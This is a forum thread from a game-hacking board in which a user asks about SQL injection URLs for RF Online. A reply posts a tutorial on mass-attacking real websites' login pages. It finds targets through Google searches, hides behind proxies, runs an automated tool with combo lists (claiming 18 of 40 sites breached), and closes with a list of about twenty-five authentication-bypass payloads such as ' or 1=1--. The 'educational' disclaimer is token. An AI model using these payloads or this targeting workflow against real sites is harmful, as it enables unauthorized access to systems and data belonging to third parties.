Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > RF Online
You last visited: Today at 17:06

  • Please register to post and access all features, it's quick, easy and FREE!

Bitcoin Dice Game

URL sql injection

Discussion on URL sql injection within the RF Online forum part of the MMORPGs category.

Old   #1
elite*gold: 0
Join Date: May 2008
Posts: 78
Received Thanks: 8
URL sql injection

any one could give me hints or anything on what url should i put in sql injection for rf online.. im a bit confused.. thanks

killemall is offline  
Old 06/22/2008, 04:26   #2
elite*gold: 0
Join Date: Jun 2008
Posts: 63
Received Thanks: 41
...LOL!!..Use SEARCH button,everything is there..

jan1993 is offline  
1 User
Old 06/24/2008, 05:11   #3
elite*gold: 0
Join Date: Apr 2006
Posts: 565
Received Thanks: 320
Technorati Tag: SQL Injection
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works



with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder


this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--


user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets


i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection

now the only trudge part is finding targets to i tend to search say google for login.asp or whatever

index of:/admin/login.asp

like this: index of login.asp



17,000 possible targets trying various searches spews out plent more

now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

and so a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level ISP.. well enough atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits when it finds a target it will spew all the strings on that site as have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process



' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

ComSec aka ZSL


WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your the right thing and let admins know ay

credits to google... LOL
playforbooting is offline  
3 Users

« I have an idea. | BYPASS RF POA »

Similar Threads Similar Threads
Injection How To
03/05/2011 - General Gaming Discussion - 17 Replies
1.) Wo kriege ich Injection her? -> 2.) Knallt euch dann alles in ein Verzeichnis, besorgt euch dann einne der supporteten Clients (steht in der ilpatch.cfg) 3.) Decrypted diesen Client mit UORice ->
Sql injection
01/19/2010 - Kal Online - 34 Replies
Eine frage woher bekomme ich den Sql Injection + tut würde mich freuen wenn einer mir weiter hilft danke
SQL injection.
02/12/2008 - Zero - 0 Replies
Hi all, This is a curious topic because i have found numerous occasions where this has happened on the chinese version of the game. Also i was wondering if anyone knows of any occasions where it has been done on the English servers? I've been researching into this and apparently it requires tracing the packets back to the DB server then using a program (once you have the address) to inject your own SQL code into the database indefinitely editing your character to what ever your choosing...
DLL Injection
06/19/2007 - Planetside - 5 Replies

All times are GMT +2. The time now is 17:06.

Powered by vBulletin®
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

BTC: 33E6kMtxYa7dApCFzrS3Jb7U3NrVvo8nsK
ETH: 0xc6ec801B7563A4376751F33b0573308aDa611E05

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2020 elitepvpers All Rights Reserved.